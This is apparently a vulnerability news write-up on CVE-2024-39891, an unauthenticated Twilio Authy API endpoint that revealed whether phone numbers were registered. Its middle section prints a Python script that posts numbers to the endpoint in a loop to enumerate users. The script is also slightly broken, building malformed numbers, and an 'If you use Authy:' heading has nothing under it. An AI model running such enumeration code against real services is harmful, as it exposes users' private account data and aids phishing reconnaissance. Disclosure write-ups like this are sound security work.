CVE CyberSecurity Database News

CVE-2024-39891 - Exposed Authy Phone Number Lookup — How Twilio’s API Leaked User Data

Poster -

In June 2024, security researchers spotted a worrying flaw in the Twilio Authy API—used by millions for secure two-factor authentication. This vulnerability, logged as CVE-2024-39891, let anyone check if a phone number was registered with Authy, even if they weren’t logged in. It didn’t expose full Authy accounts, but it potentially let attackers build lists of numbers using Authy, opening the door to targeted phishing or attacks on other services.

Let’s unpack what happened, look at an example exploit, and explain how this leak could be abused.

What is Authy and Why This Matters

Authy is one of the world’s most popular authentication apps, used by both businesses and individuals to secure sensitive accounts. Its API is supposed to be locked down, only providing information to authenticated requests—think of it as a locked door. But this flaw left a window wide open.

Versions Affected

* Android: All versions before 25.1.
* iOS: All versions before 26.1.

Vulnerability Details

The heart of the issue is an unprotected HTTP endpoint in Authy’s infrastructure. This endpoint accepted requests with a phone number in them (for example, +15555551234), even from unauthenticated users.

What Could Attackers See?

The endpoint would respond with information about whether each particular phone number was linked to an Authy account. That means anyone could write a script, fire off thousands of phone numbers, and collect a neat list of numbers using Authy.

No passwords, 2FA codes, or login data were exposed.

But the ability to check *which* numbers use Authy is valuable for attackers doing "recon" to plan more sophisticated attacks.

How the Flaw Was Exploited

Throughout June 2024, security researchers and threat actors discovered (and reportedly abused) this vulnerability in the wild. The endpoint was usually something like:

POST https://api.authy.com/protected/json/users/new

But it was accessible without authentication. Some reports say the vulnerability was tied directly to mobile app endpoints used for account onboarding or verification.

Below is a simple example, based on public analysis, of how a script could have exploited the bug

import requests

def check_number(phone_number):
    url = 'https://api.authy.com/protected/json/users/new'
    data = {
        "user": {
            "cellphone": phone_number,
            "country_code": "1" # US; adjust as needed
        }
    }
    # No Auth header needed!
    resp = requests.post(url, json=data)
    if 'already registered' in resp.text or 'exists' in resp.text:
        print(f"{phone_number}: REGISTERED with Authy")
    else:
        print(f"{phone_number}: Not registered (or error)")

# Brute-force a few numbers for demo
for i in range(55551230, 55551240):
    check_number(f"555{i}")

Note: This is for educational purposes. Abuse of any API is illegal and unethical. The bug has (as of late June 2024) been fixed by Twilio.

Why Is This Dangerous?

Even though account takeovers were not possible directly, exposing the "does this number use Authy?" answer is dangerous:

1. Targeted Phishing: Attackers can know which people use Authy and target them with fake alerts or scam calls.
2. Service Enumeration: Companies who know you use Authy can guess which services you protect and try to trick you out of codes.
3. Secondary Recon: Attackers planning attacks on sensitive services (banks, crypto exchanges) know which users care about 2FA.

Official References and Timeline

- NIST National Vulnerability Database, CVE-2024-39891
- Twilio Security Advisories
- SecurityWeek: Authy flaw exposed phone number info

How Was It Fixed?

Twilio closed the endpoint so it now requires proper authentication. Updated mobile apps (Android/iOS) are immune to this leak.

If you use Authy:

Summary

CVE-2024-39891 is a reminder that even APIs for trusted security apps can have dangerous leaks. While no full accounts were stolen, information exposure—even just which phone numbers use Authy—gives attackers a valuable head start. Twilio’s quick patch solved the immediate risk, but always update and protect your apps!


Stay Safe, and Watch for Updates
For more technical background, read the official NVD entry or Twilio’s security portal. And always install app updates as soon as possible.

Timeline

Published on: 07/02/2024 18:15:03 UTC
Last modified on: 07/24/2024 14:38:43 UTC